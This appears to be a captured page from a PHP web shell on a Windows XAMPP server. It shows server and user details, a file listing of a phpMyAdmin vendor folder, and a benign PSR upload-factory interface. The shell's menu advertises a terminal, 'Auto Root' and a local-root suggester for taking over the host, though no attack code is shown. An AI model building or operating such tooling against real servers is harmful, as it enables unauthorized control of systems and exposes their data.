Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
phpMyAdmin /
vendor /
psr /
http-factory /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
RequestFactoryInterface.php
499
B
-rw-rw-rw-
2023-02-07 22:26
ResponseFactoryInterface.php
546
B
-rw-rw-rw-
2023-02-07 22:26
ServerRequestFactoryInterface.php
927
B
-rw-rw-rw-
2023-02-07 22:26
StreamFactoryInterface.php
1.38
KB
-rw-rw-rw-
2023-02-07 22:26
UploadedFileFactoryInterface.php
1.08
KB
-rw-rw-rw-
2023-02-07 22:26
UriFactoryInterface.php
325
B
-rw-rw-rw-
2023-02-07 22:26
Save
Rename
<?php namespace Psr\Http\Message; interface UploadedFileFactoryInterface { /** * Create a new uploaded file. * * If a size is not provided it will be determined by checking the size of * the file. * * @see http://php.net/manual/features.file-upload.post-method.php * @see http://php.net/manual/features.file-upload.errors.php * * @param StreamInterface $stream Underlying stream representing the * uploaded file content. * @param int $size in bytes * @param int $error PHP file upload error * @param string $clientFilename Filename as provided by the client, if any. * @param string $clientMediaType Media type as provided by the client, if any. * * @return UploadedFileInterface * * @throws \InvalidArgumentException If the file resource is not readable. */ public function createUploadedFile( StreamInterface $stream, int $size = null, int $error = \UPLOAD_ERR_OK, string $clientFilename = null, string $clientMediaType = null ): UploadedFileInterface; }